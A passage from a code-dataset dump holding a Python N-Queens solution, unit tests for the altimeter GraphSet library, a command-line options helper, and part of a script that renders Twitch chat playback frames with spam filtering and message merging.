\"Q...\",\n# \"...Q\",\n# \".Q..\"]\n# ]\n# Explanation: There exist two distinct solutions to the 4-queens puzzle as shown above.\n\nfrom typing import List\n\n\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n \"\"\"\n We place queens on the board one row at a time,\n starting with the top row.\n To place the rth queen,\n we methodically try all n squares in row r\n from left to right in a simple for loop.\n If a particular square is attacked by an earlier queen,\n we ignore that square;\n otherwise,\n we tentatively place a queen on that\n square and recursively grope for consistent placements of\n the queens in later rows\n -- Algorithm By Jeff Erickson\n \"\"\"\n results = []\n\n Q = [-1 for _ in range(n)]\n\n def Place_Queens(Q: List[int], r: int):\n if r == len(Q):\n result = []\n # convert result to answer\n for i in Q:\n result.append(\"\".join(\n [\".\" if x != i else \"Q\" for x in range(n)]))\n results.append(result)\n else:\n # The outer for-loop considers all possible placements\n # of a queen on row r;\n for j in range(len(Q)):\n legal = True\n # the inner for-loop checks whether a candidate\n # placement of row r is consistent with\n # the queens that are already on the first r − 1 rows.\n for i in range(r):\n if (\n # check horizontally : if the line above occupy\n # same x,horizontally illegel\n (Q[i] == j) or\n # https: // i.loli.net/2019/09/03/qvfk2x4RQltwy8d.png\n # diagonally right\n (Q[i] == j + (r-i)) or\n # diagonally left\n (Q[i] == j - (r-i))\n ):\n legal = False\n if (legal):\n Q[r] = j\n Place_Queens(Q, r + 1)\n\n Place_Queens(Q, 0)\n\n return results\n\n\nif __name__ == '__main__':\n from util import Test\n s = Solution()\n result = [[\".Q..\", \"...Q\", \"Q...\", \"..Q.\"],\n [\"..Q.\", \"Q...\", \"...Q\", \".Q..\"]]\n t = Test(s.solveNQueens)\n t.equal(result, 4)\n","sub_path":"Python/51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"358185294","text":"from typing import Any, List, Type\nfrom unittest import TestCase\n\nfrom altimeter.core.graph.exceptions import (\n GraphSetOrphanedReferencesException,\n UnmergableDuplicateResourceIdsFoundException,\n UnmergableGraphSetsException,\n)\nfrom altimeter.core.graph.graph_set import GraphSet\nfrom altimeter.core.graph.link.links import ResourceLinkLink, SimpleLink\nfrom altimeter.core.multilevel_counter import MultilevelCounter\nfrom altimeter.core.resource.resource import Resource\nfrom altimeter.core.resource.resource_spec import ResourceSpec\nfrom altimeter.core.resource.exceptions import ResourceSpecClassNotFoundException\n\n\n\nclass TestResourceSpecA(ResourceSpec):\n type_name = \"a\"\n\n @classmethod\n def get_full_type_name(self):\n return \"test:a\"\n\n @classmethod\n def scan(cls: Type[\"TestResourceSpecA\"], scan_accessor: Any) -> List[Resource]:\n raise NotImplementedError()\n\n\n\nclass TestResourceSpecB(ResourceSpec):\n type_name = \"b\"\n\n @classmethod\n def get_full_type_name(self):\n return \"test:b\"\n\n @classmethod\n def scan(cls: Type[\"TestResourceSpecB\"], scan_accessor: Any) -> List[Resource]:\n raise NotImplementedError()\n\n\nclass TestScanAccessor:\n pass\n\n\nclass TestGraphSetWithValidDataNoMerging(TestCase):\n def setUp(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(resource_id=\"456\", type_name=\"test:a\")\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n resources = [resource_a1, resource_a2, resource_b1, resource_b2]\n self.graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n stats=MultilevelCounter(),\n )\n\n def test_rdf_a_type(self):\n graph = self.graph_set.to_rdf()\n\n a_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_a_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"test-name:has-foo\", \"goo\"),\n (\"test-name:id\", \"123\"),\n (\"test-name:id\", \"456\"),\n ]\n a_result_tuples = []\n for a_result in a_results:\n self.assertEqual(2, len(a_result))\n a_result_tuples.append((str(a_result[0]), str(a_result[1])))\n self.assertEqual(expected_a_result_tuples, a_result_tuples)\n\n def test_rdf_b_type(self):\n graph = self.graph_set.to_rdf()\n graph.serialize(\"/tmp/test.rdf\")\n linked_a_node_results = graph.query(\n \"select ?s where {?s a ; '123' }\"\n )\n self.assertEqual(len(linked_a_node_results), 1)\n for linked_a_node_result in linked_a_node_results:\n linked_a_node = str(linked_a_node_result[0])\n b_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_b_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:b\"),\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:b\"),\n (\"test-name:has-a\", str(linked_a_node)),\n (\"test-name:id\", \"abc\"),\n (\"test-name:id\", \"def\"),\n (\"test-name:name\", \"sue\"),\n ]\n b_result_tuples = []\n for b_result in b_results:\n self.assertEqual(2, len(b_result))\n b_result_tuples.append((str(b_result[0]), str(b_result[1])))\n self.assertEqual(expected_b_result_tuples, b_result_tuples)\n\n def test_rdf_error_graphing(self):\n graph = self.graph_set.to_rdf()\n\n err_results = graph.query(\"select ?o where { ?s ?o } order by ?o\")\n err_strs = []\n expected_err_strs = [\"test err 1\", \"test err 2\"]\n for err_result in err_results:\n self.assertEqual(1, len(err_result))\n err_strs.append(str(err_result[0]))\n self.assertEqual(err_strs, expected_err_strs)\n\n def test_to_dict(self):\n expected_dict = {\n \"name\": \"test-name\",\n \"version\": \"1\",\n \"start_time\": 1234,\n \"end_time\": 4567,\n \"resources\": {\n \"123\": {\n \"type\": \"test:a\",\n \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}],\n },\n \"456\": {\"type\": \"test:a\"},\n \"abc\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}],\n },\n \"def\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}],\n },\n },\n \"errors\": [\"test err 1\", \"test err 2\"],\n \"stats\": {\"count\": 0},\n }\n self.assertDictEqual(expected_dict, self.graph_set.to_dict())\n\n def test_from_dict(self):\n input_dict = {\n \"name\": \"test-name\",\n \"version\": \"1\",\n \"start_time\": 1234,\n \"end_time\": 4567,\n \"resources\": {\n \"123\": {\n \"type\": \"test:a\",\n \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}],\n },\n \"456\": {\"type\": \"test:a\"},\n \"abc\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}],\n },\n \"def\": {\n \"type\": \"test:b\",\n \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}],\n },\n },\n \"errors\": [\"test err 1\", \"test err 2\"],\n \"stats\": {\"count\": 0},\n }\n graph_set = GraphSet.from_dict(input_dict)\n self.assertEqual(graph_set.to_dict(), input_dict)\n\n def test_validate(self):\n self.graph_set.validate()\n\n\nclass TestGraphSetWithValidDataMerging(TestCase):\n def setUp(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-goo\", obj=\"foo\")]\n )\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n resources = [resource_a1, resource_a2, resource_b1, resource_b2]\n self.graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n stats=MultilevelCounter(),\n )\n\n def test_rdf_a_type(self):\n graph = self.graph_set.to_rdf()\n\n a_results = graph.query(\n \"select ?p ?o where {?s a ; ?p ?o} order by ?p ?o\"\n )\n expected_a_result_tuples = [\n (\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\", \"test-name:test:a\"),\n (\"test-name:has-foo\", \"goo\"),\n (\"test-name:has-goo\", \"foo\"),\n (\"test-name:id\", \"123\"),\n ]\n a_result_tuples = []\n for a_result in a_results:\n self.assertEqual(2, len(a_result))\n a_result_tuples.append((str(a_result[0]), str(a_result[1])))\n self.assertEqual(expected_a_result_tuples, a_result_tuples)\n\n def test_validate(self):\n self.graph_set.validate()\n\n\nclass TestGraphSetWithInValidData(TestCase):\n def test_unknown_type_name(self):\n resources = [\n Resource(resource_id=\"xyz\", type_name=\"test:a\"),\n Resource(resource_id=\"xyz\", type_name=\"test:c\"),\n ]\n with self.assertRaises(ResourceSpecClassNotFoundException):\n GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[],\n stats=MultilevelCounter(),\n )\n\n def test_invalid_resources_dupes_same_class_conflicting_types_no_allow_clobber(self):\n resources = [\n Resource(resource_id=\"123\", type_name=\"test:a\"),\n Resource(resource_id=\"123\", type_name=\"test:b\"),\n ]\n with self.assertRaises(UnmergableDuplicateResourceIdsFoundException):\n GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[],\n stats=MultilevelCounter(),\n )\n\n def test_orphaned_ref(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"456\")]\n )\n resources = [resource_a1, resource_b1]\n graph_set = GraphSet(\n name=\"test-name\",\n version=\"1\",\n start_time=1234,\n end_time=4567,\n resources=resources,\n errors=[\"test err 1\", \"test err 2\"],\n stats=MultilevelCounter(),\n )\n with self.assertRaises(GraphSetOrphanedReferencesException):\n graph_set.validate()\n\n\nclass TestGraphSetMerge(TestCase):\n def test_invalid_diff_names(self):\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-2\",\n version=\"1\",\n start_time=15,\n end_time=25,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n with self.assertRaises(UnmergableGraphSetsException):\n graph_set_1.merge(graph_set_2)\n\n def test_invalid_diff_versions(self):\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-1\",\n version=\"2\",\n start_time=15,\n end_time=25,\n resources=[],\n errors=[],\n stats=MultilevelCounter(),\n )\n with self.assertRaises(UnmergableGraphSetsException):\n graph_set_1.merge(graph_set_2)\n\n def test_valid_merge(self):\n resource_a1 = Resource(\n resource_id=\"123\", type_name=\"test:a\", links=[SimpleLink(pred=\"has-foo\", obj=\"goo\")]\n )\n resource_a2 = Resource(resource_id=\"456\", type_name=\"test:a\")\n resource_b1 = Resource(\n resource_id=\"abc\", type_name=\"test:b\", links=[ResourceLinkLink(pred=\"has-a\", obj=\"123\")]\n )\n resource_b2 = Resource(\n resource_id=\"def\", type_name=\"test:b\", links=[SimpleLink(pred=\"name\", obj=\"sue\")]\n )\n graph_set_1 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=10,\n end_time=20,\n resources=[resource_a1, resource_a2],\n errors=[\"errora1\", \"errora2\"],\n stats=MultilevelCounter(),\n )\n graph_set_2 = GraphSet(\n name=\"graph-1\",\n version=\"1\",\n start_time=15,\n end_time=25,\n resources=[resource_b1, resource_b2],\n errors=[\"errorb1\", \"errorb2\"],\n stats=MultilevelCounter(),\n )\n graph_set_1.merge(graph_set_2)\n\n self.assertEqual(graph_set_1.name, \"graph-1\")\n self.assertEqual(graph_set_1.version, \"1\")\n self.assertEqual(graph_set_1.start_time, 10)\n self.assertEqual(graph_set_1.end_time, 25)\n self.assertCountEqual(graph_set_1.errors, [\"errora1\", \"errora2\", \"errorb1\", \"errorb2\"])\n expected_resource_dicts = [\n {\"type\": \"test:a\", \"links\": [{\"pred\": \"has-foo\", \"obj\": \"goo\", \"type\": \"simple\"}]},\n {\"type\": \"test:a\"},\n {\"type\": \"test:b\", \"links\": [{\"pred\": \"has-a\", \"obj\": \"123\", \"type\": \"resource_link\"}]},\n {\"type\": \"test:b\", \"links\": [{\"pred\": \"name\", \"obj\": \"sue\", \"type\": \"simple\"}]},\n ]\n resource_dicts = [resource.to_dict() for resource in graph_set_1.resources]\n self.assertCountEqual(expected_resource_dicts, resource_dicts)\n","sub_path":"tests/unit/altimeter/core/graph/test_graph_set.py","file_name":"test_graph_set.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"121627338","text":"#!/usr/bin/python3\ndef exit_m(message):\n print(message)\n exit(0)\n\ndef ini_options(argv):\n global OPT_C\n global OPT_V\n OPT_C = 0\n OPT_V = 0\n argv = [arg for arg in argv if arg]\n for arg in argv:\n if arg[0] == '-':\n for l in arg[1:]:\n if l == 'v':\n OPT_V = 1\n elif l == 'c':\n OPT_C = 1\n else:\n print(\"unknown option '{:s}'\".format(l))\n return [arg for arg in argv if arg[0] != '-']\n\ndef verbose(message):\n if OPT_V == 1:\n print(message)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38297733","text":"# only for @dotafeeding's personal use\n\n# Twitch Chat PlayBack\n# - scrolling at 60fps actuated based on time\n# - text movement and size based on sentiment volume\n\n# usage: chatvid.py [filename]\n# Each line of chat is stored like this-> stream$user:message|chatTime\n# This script is queued in batches by \"chathighlightqueue.py\", once the desired clips have been selected in Adobe Premiere.\n\n#known issues: \n#extra large emotes abruptly cut off due to render time optimization of not rendering past 4 emotes\n\n#output: f:/clipchat/[Clip Name]/[Frame Number].png \n\n\n#------\n#Config\n\ntimeMergeDistance = 6.44\t\t\t\ntimeMergeDistance = 99.95\t\t\t\ntimeMergeDistance = 31.95\t\t\t\n\ntimeMergeDistance = 7.44\n\n#smaller merge intervals allow for more granular responses (great for when many events occur within a short space)\n#large intervals are good for totaling response counts across the whole chat (great for when just one or few original thoughts appear in chat)\n\nrightAlign = 1\n#rightAlign = 0\n\n\nmsgLen = 22\nmsgLen = 69\n#maximum length messages allowed\n\n\nbannedphrase = [\"d\",\"albert\",\"notatk\"]#banned keywords\n\n#-------\n\n\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy, sys,os,time\ntry:\n from os import scandir, walk\nexcept ImportError:\n from scandir import scandir, walk\t\nfrom random import randint\nfrom fuzzywuzzy import fuzz\n\nscrollNeeded = 0\nspeed = 0\ntextHeight = 0\nspeeds=[]\nend = 0\n\npath = 'C:/Drive/Code/emotes'\nemotes = []\nfor entry in os.scandir(path):\n\tentry = entry.name\t\n\temotes.append(entry.split(\".\")[0])\n\t\nargs = sys.argv\n\nfilename = 'f:/clipchat/' + args[1] + '/'\nos.mkdir(filename)#runtime is broken if the directory already exists\n\nwith open(\"g:/clips/\" + args[1]) as chatvid:\n\tchatvid = chatvid.readlines()\nout = [x.strip() for x in chatvid]\n\n\n\nblacklist = [\"http\",\"forsen\",\"ᵃ\",\"ᴇ\",\"۞\",\"⎠\",\"📞\",\"É\",\"╣\",\"tyler\",\"sourpls\",\"admiral\",\"TOLI\",\"\u0001\",\"󀀀\",\"贡\",\"ȓ\",\"񡠎\",\"򬀀\",\"ҏ\"]\n\n\nwith open(\"D:/streamdata/helpers\") as helpers:\n\thelpers = helpers.readlines()\n\nhelpers = [x.strip() for x in helpers]\n\n\nfor x in out:\n\ttry:\n\t\tprint(x)\n\t\tfor y in blacklist:\n\t\t\tif y in x.lower():\n\t\t\t\traise\n\texcept:\n\t\tout.remove(x) #remove non utf-8 lines\n\nmostPop={}\nfor chat in out:\n\ttry:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] +=1 \n\texcept:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] =1 \nalreadyChecked = []\n\t\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ch2 in out:\n\t\t\t\t\tif ch.split(\":\")[0] == ch2.split(\":\")[0] and fuzz.ratio(ch.split(\":\")[1].split(\"|\")[0].lower(),ch2.split(\":\")[1].split(\"|\")[0].lower()) > 55 and ch != ch2:\n\t\t\t\t\t\tif mostPop[ch.split(\":\")[1].split(\"|\")[0]] > mostPop[ch2.split(\":\")[1].split(\"|\")[0]]:#remove similar message spam from the same user\n\t\t\t\t\t\t\tout.remove(ch2)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\traise\n\t\t\t\talreadyChecked.append(ch)\n\texcept:\n\t\tbreaker = 0\n\t\t\n\t\tpass\n\tif breaker:\n\t\tbreak\nmostPop = {}\n\nprint(\"spam removed\")\n\nfor chat in out:\n\ttry:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] +=1 \n\texcept:\n\t\tmostPop[chat.split(\":\")[1].split(\"|\")[0]] =1 \n\nalreadyChecked = []\n\t\t\t\n\t\t\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ranked in mostPop:\n\t\t\t\t\tif (fuzz.ratio(ch.split(\":\")[1].split(\"|\")[0], ranked) > 83 or fuzz.token_sort_ratio(ch.split(\":\")[1].split(\"|\")[0], ranked) > 95) and mostPop[ranked] > mostPop[ch.split(\":\")[1].split(\"|\")[0]]:\n\t\t\t\t\t\tout.append(( ch.split(\":\")[0] + \":\"+ranked + \"|\" + ch.split(\"|\")[1] )) # rank the most common spellings. change extremely similar messages to use the most common spelling (misspelling correction) \n\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\traise\n\t\t\t\talreadyChecked.append(ch)\n\t\t\t\t\n\texcept:\n\t\tbreaker = 0\n\t\tpass\n\t\t\t\t\n\tif breaker:\n\t\tbreak\nalreadyChecked = []\n\t\t\t\nprint(\"corrections made\")\n\n\n\nwhile True:\n\tbreaker = 1\n\ttry:\n\t\tfor ch in out:\n\t\t\tif ch not in alreadyChecked:\n\t\t\t\tfor ch2 in out:\t\t\t\t\t\t#merge identical messages, while displaying username list ranked by fastest reaction time, and counting unique users saying each unique message\n\t\t\t\t\tif ch.split(\"|\")[0].split(\":\")[1].lower() == ch2.split(\"|\")[0].split(\":\")[1].lower() and float(ch2.split(\"|\")[1]) - float(ch.split(\"|\")[1]) < timeMergeDistance and float(ch2.split(\"|\")[1])-float(ch.split(\"|\")[1]) >= 0 and ch != ch2:\n\t\t\t\t\t\tpopCheck={}\n\t\t\t\t\t\tfor chat in mostPop:\n\t\t\t\t\t\t\tif chat.lower() == ch.split(\":\")[1].split(\"|\")[0].lower():\n\t\t\t\t\t\t\t\tpopCheck[chat] = mostPop[chat]\n\t\t\t\t\t\tphrase = max(popCheck, key=popCheck.get)\n\t\t\t\t\t\thelper = \"\"\n\t\t\t\t\t\thelpSum = 0\n\t\t\t\t\t\tif ch2.split(\":\")[0] in helpers:\n\t\t\t\t\t\t\thelpSum += 1\n\t\t\t\t\t\t\thelper += ch2.split(\":\")[0] +\", \"\n\t\t\t\t\t\tif ch.split(\":\")[0] in helpers:\n\t\t\t\t\t\t\thelpSum += 1\n\t\t\t\t\t\t\thelper += ch.split(\":\")[0] + \", \"\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tif len( (ch.split(\":\")[0] + \", \" +ch2.split(\":\")[0]) ) > 32 or \"+\" in ch.split(\":\")[0] or \"+\" in ch2.split(\":\")[0]:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttotal = ch2.split(\":\")[0].count(\",\")\n\t\t\t\t\t\t\ttotal+= ch.split(\":\")[0].count(\",\")\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ttotal += int(ch2.split(\":\")[0].split(\"+\")[1])\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\ttotal += int(ch.split(\":\")[0].split(\"+\")[1])\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\tif \",\" not in ch.split(\":\")[0]:\n\t\t\t\t\t\t\t\ttotal+= 1\n\t\t\t\t\t\t\tif \",\" not in ch2.split(\":\")[0]:\n\t\t\t\t\t\t\t\ttotal+= 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\ttotal -= helpSum\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif \"+\" in ch.split(\":\")[0]:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\"+\")[0] + \"+\" + str(total) + \":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\":\")[0] + \", +\" + str(total) + \":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif ch.split(\":\")[0] in helper and ch2.split(\":\")[0] in helper or (ch.split(\":\")[0] not in helper and ch2.split(\":\")[0] not in helper):\n\t\t\t\t\t\t\t\tout.append(( ch.split(\":\")[0] + \", \" +ch2.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\telif ch.split(\":\")[0] in helper:\n\t\t\t\t\t\t\t\tout.append(( helper +ch2.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\telif ch2.split(\":\")[0] in helper:\n\t\t\t\t\t\t\t\tout.append(( helper + ch.split(\":\")[0] +\":\" +phrase + \"|\" + ch.split(\"|\")[1] ))\n\t\t\t\t\t\t\n\t\t\t\t\t\tout.remove(ch)\n\t\t\t\t\t\tout.remove(ch2)\n\t\t\t\t\t\traise\n\t\t\t\t\n\t\t\t\talreadyChecked.append(ch)\n\texcept:\n\t\tbreaker = 0\n\t\tpass\n\tif breaker:\n\t\tbreak\n\t\n\t\ncount = 0\nframeskip = 0\nchat = {}\nfor ch in out:\n\tif len(ch.split(\"|\")[0].split(\":\")[1]) < 35:\n\t\tdoit = 1\n\t\tfor x in ch.split(\"|\")[0].split(\":\")[1].split(\" \"):\n\t\t\tif x.lower() in bannedphrase:\n\t\t\t\tdoit = 0\n\t\tif ch.split(\"|\")[0].split(\":\")[1].lower() in bannedphrase:\n\t\t\tdoit = 0\n\t\tif doit:\n\t\t\ttry:\n\t\t\t\tchat[ch.split(\"|\")[0].split(\"$\")[1]] = float(ch.split(\"|\")[1])\n\t\t\texcept:\n\t\t\t\tchat[ch.split(\"|\")[0]] = float(ch.split(\"|\")[1])\n\ncurrentLines = {}\ncLcount = 0\ninterval = 0.322\nchatTime = chat[min(chat,key=chat.get)] - interval+1\ncolor = (0,0,0)\ncolorKey = \"#00ff00\"\ncolorLota = (255,255,255)\ncolorLotaBlue = (0,255,255)\nheight = int(1400/700 * 900)\nW = 1400\nH = int(1400/700 * 45)\n\nshakeCooldown = {}\nsize = int(W / 700 * 35)\nfont = ImageFont.truetype('D:/streamdata/DINPro-Medium.otf', size)\nemoteSize = int(W / 700 * 35)\n\npauselen = 45\npausedFrames = 0\nwhile len(chat) > 0 or scrollNeeded > 20 or end < 40:\n\tchatTime += 1/60\n\t\n\ttry:\n\t\t\n\t\tif chat[min(chat,key=chat.get)] - chatTime < interval:\n\t\t\tcurrentLines[cLcount] = (min(chat,key=chat.get).split(\":\")[0],min(chat,key=chat.get).split(\":\")[1])\n\t\t\tshakeCooldown[cLcount] = 0\n\t\t\tcLcount +=1\n\t\t\tchat.pop(min(chat,key=chat.get))\n\t\t\ttextHeight += H\n\t\t\tscrollNeeded += H\n\texcept:\n\t\ttry:\n\t\t\tchat.pop(min(chat,key=chat.get))\n\t\texcept:\n\t\t\tpass\n\t\tpass\n\t\n\twhile height< -80:\n\t\theight = height + H\n\t\tcurrentLines.pop(min(currentLines))\n\t\n\t\n\ttext = Image.new(\"RGBA\",(W,textHeight+H))\n\tdraw = ImageDraw.Draw(text)\n\t\n\tframeHeight = 0\n\t\n\n\tboostonce = 1\n\tdraw13 = 0\n\tfor line in currentLines:\n\t\tif draw13 < 25:\n\t\t\toutUser = currentLines[line][0]\n\t\t\toutMsg = currentLines[line][1]\n\t\t\t\n\t\t\twords = {}\n\t\t\t\n\t\t\torder = -1\n\t\t\tfor word in outMsg.split(\" \"):\n\t\t\t\torder += 1\n\t\t\t\tw,h = draw.textsize(word, font=font)\n\t\t\t\tif word.lower() in emotes:\n\t\t\t\t\tw = emoteSize\n\t\t\t\t\th = emoteSize\n\t\t\t\twords[order] = [word, w]\n\t\t\ttotalWidth = 0\n\t\t\t\n\t\t\tspacing = W/700 *8\n\t\t\t\n\t\t\twhile order !=-1:\n\t\t\t\ttotalWidth += words[order][1]\n\t\t\t\ttotalWidth += spacing\n\t\t\t\torder -=1\n\t\t\twidthsofar = 0\n\t\t\torder = 0\n\t\t\t\n\t\t\tintensity = 0\n\t\t\t\n\t\t\tif \"+\" in outUser:\n\t\t\t\tintensity = int(outUser.split(\"+\")[1])\n\t\t\t\tcooldown = 1\n\t\t\t\t\n\t\t\t\tif intensity < 5 and shakeCooldown[line]>7:\n\t\t\t\t\tshake = 1\n\t\t\t\telif intensity < 10 and shakeCooldown[line]>5:\n\t\t\t\t\tshake = 2\n\t\t\t\telif intensity < 25 and shakeCooldown[line]>3:\n\t\t\t\t\tshake = 3\n\t\t\t\telif intensity < 50 and shakeCooldown[line]>2:\n\t\t\t\t\tshake = 4\n\t\t\t\telif intensity < 100 and shakeCooldown[line]>1:\n\t\t\t\t\tshake = 5\n\t\t\t\telif intensity > 100:\n\t\t\t\t\tshake = 6\n\t\t\t\telse:\n\t\t\t\t\tcooldown =0\n\t\t\t\t\t\n\t\t\t\tif cooldown:\n\t\t\t\t\tshakeH = shake / randint(1,2)\n\t\t\t\t\tif randint(0,1):\n\t\t\t\t\t\tshakeH *= -1\n\t\t\t\t\t\t\n\t\t\t\t\tshakeW = shake / randint(1,2)\n\t\t\t\t\tif randint(0,1):\n\t\t\t\t\t\tshakeW *= -1\n\t\t\t\t\t\n\t\t\t\t\tx = randint(0,1)\n\t\t\t\telse:\n\t\t\t\t\tshakeW = 0\n\t\t\t\t\tshakeH = 0\n\t\t\t\t\n\t\t\t\tshakeCooldown[line] += 1\n\t\t\telse:\n\t\t\t\tshakeW = 0\n\t\t\t\tshakeH = 0\n\t\t\t\n\t\t\twhile order != len(words):\n\t\t\t\tif words[order][0].lower() in emotes:\n\t\t\t\t\temote = 'C:/Drive/Code/emotes/'\n\t\t\t\t\temote += words[order][0].lower()\n\t\t\t\t\temote+= '.png'\n\t\t\t\t\ttry:\n\t\t\t\t\t\temote = Image.open(emote, 'r')\n\t\t\t\t\t\temote = emote.resize((emoteSize+intensity*3,emoteSize+intensity*3) ,Image.LANCZOS)\n\t\t\t\t\t\tif shakeW != 0 and shakeH !=0:\n\t\t\t\t\t\t\temote = emote.rotate(int(randint(-1,1) * (shakeW * shakeH / 3) ), resample=Image.BILINEAR)\n\t\t\t\t\t\ttext.paste(emote,( int( (W-totalWidth) *rightAlign +widthsofar+int(shakeW) -intensity*3) ,0 +frameHeight+int(shakeH)),emote)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(words[order][0].lower() + \" is an invalid emote image\")\n\t\t\t\t\twidthsofar += emoteSize + 5\n\t\t\t\telse:\n\t\t\t\t\n\t\t\t\t\t#crude method of drawing an outer stroke\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-2) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+2) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW) ,4-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW-1) ,4-1-10+frameHeight+shakeH)), words[order][0], font=font, fill=color)\n\t\t\t\t\tdraw.text( ( ( (((W-totalWidth) * rightAlign )+widthsofar+shakeW+1) ,4-1-10+frameHeight+shakeH)), words[order][0], font=font, 